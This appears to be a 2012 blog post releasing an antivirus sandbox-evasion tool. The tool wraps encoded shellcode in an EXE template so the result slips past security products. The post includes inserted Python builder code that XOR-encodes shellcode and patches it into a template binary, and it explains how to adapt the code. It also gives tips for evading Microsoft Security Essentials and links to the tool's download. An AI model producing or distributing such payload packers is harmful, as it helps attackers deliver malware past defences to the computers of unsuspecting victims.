Antivirus Sandbox Evasion (part 3) – The Tool
Ok, here we are..
Thank you for your patience. It is time to release version 0.1 of the “tool”.. ;-)
The archive is composed of:
- An EXE template (ultimate-payload-template1.exe) which handles the sandbox evasion.
- A Perl script (ultimate-payload.pl) which reads a shellcode in binary format from STDIN, encodes it, and builds a new EXE file based on the template.
- The source code of the encoder (in assembly) and the template (Visual Studio 2008).
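To make the builder's job concrete, here is an added example (not foip's ultimate-payload.pl, which is Perl, nor his assembly encoder) showing the same three steps in Python: read raw shellcode from STDIN, encode it, and write the result into a slot reserved inside a template binary. The marker string, the slot layout, the slot size and the repeating-key XOR encoding are all assumptions for illustration; the page does not say how the real template and encoder lay out their data. The template itself is a constructed stand-in, since the real one is not on the page.

```python
"""Added example: build an EXE from a template by patching an encoded
payload into a reserved slot. Not foip's tool; marker, slot layout and
XOR encoding are assumptions made for this illustration."""
import struct
import sys

# Assumed: the template is compiled with a zero-filled buffer that starts
# with this marker so the builder can locate it in the compiled binary.
MARKER = b"ULTIMATE_PAYLOAD_SLOT:"
SLOT_SIZE = 4096               # bytes reserved after the marker (assumed)
HEADER = struct.Struct("<HI")  # u16 key length, u32 encoded payload length


def xor_encode(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Symmetric, so the same call also decodes."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_exe(template: bytes, shellcode: bytes, key: bytes) -> bytes:
    """Return a copy of the template with the encoded payload written into
    the reserved slot. Assumed slot layout:
    marker | u16 key_len | u32 enc_len | key | encoded shellcode | zero pad."""
    off = template.find(MARKER)
    if off < 0:
        raise ValueError("marker not found in template")
    if template.find(MARKER, off + 1) >= 0:
        raise ValueError("marker must occur exactly once in the template")
    enc = xor_encode(shellcode, key)
    body = HEADER.pack(len(key), len(enc)) + key + enc
    if len(body) > SLOT_SIZE:
        raise ValueError(f"payload needs {len(body)} bytes, slot holds {SLOT_SIZE}")
    start = off + len(MARKER)
    padded = body + b"\x00" * (SLOT_SIZE - len(body))
    # Same length as the template: nothing after the slot moves.
    return template[:start] + padded + template[start + SLOT_SIZE:]


def extract_payload(exe: bytes) -> bytes:
    """Mirror of what a decoder stub in the template would do at run time:
    find the slot, read the header, pull out key and ciphertext, decode."""
    off = exe.find(MARKER)
    if off < 0:
        raise ValueError("marker not found")
    pos = off + len(MARKER)
    key_len, enc_len = HEADER.unpack_from(exe, pos)
    pos += HEADER.size
    key = exe[pos:pos + key_len]
    enc = exe[pos + key_len:pos + key_len + enc_len]
    return xor_encode(enc, key)


def make_fake_template() -> bytes:
    """Constructed stand-in for ultimate-payload-template1.exe: arbitrary
    bytes, the marker, a zero-filled slot, more arbitrary bytes."""
    return b"MZ" + b"\x90" * 64 + MARKER + b"\x00" * SLOT_SIZE + b"\xcc" * 32


# Constructed sample input: harmless printable bytes standing in for shellcode.
SAMPLE_SHELLCODE = bytes(range(0x20, 0x7f)) * 3
SAMPLE_KEY = b"\x5a\x13\xc7"

if __name__ == "__main__":
    # Same interface as the tool described above: raw shellcode on STDIN,
    # the patched binary on STDOUT. Falls back to the sample if STDIN is empty.
    shellcode = sys.stdin.buffer.read() or SAMPLE_SHELLCODE
    sys.stdout.buffer.write(build_exe(make_fake_template(), shellcode, SAMPLE_KEY))
```

The two checks in `build_exe` are the ones worth keeping when adapting this to a real template: the marker must occur exactly once (a second copy, for instance in a debug string, would make the builder patch the wrong bytes), and the header plus key plus ciphertext must fit in the reserved slot, because overrunning it would overwrite whatever the compiler placed next.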
I do not expect it to bypass all AVs forever. I expect new signatures for the template to appear shortly. But don’t worry: all you have to do is modify the template’s source code and recompile it. If a new sandbox gives you trouble, just use your imagination ;-)
Note: this technique no longer works against Microsoft Security Essentials. For this reason I wrote a new version (0.2) with a new technique, but that one will not be published.. (yet). However, a little bird told me that adding a stupid junk loop to v0.1 does the trick against Security Essentials ;-)
Download the tool: ultimate-payload-v0.1.tar.gz and read the HOWTO.txt file.
As usual, be nice. Ask the owner’s permission before infecting a computer…
© 2012, foip. All rights reserved.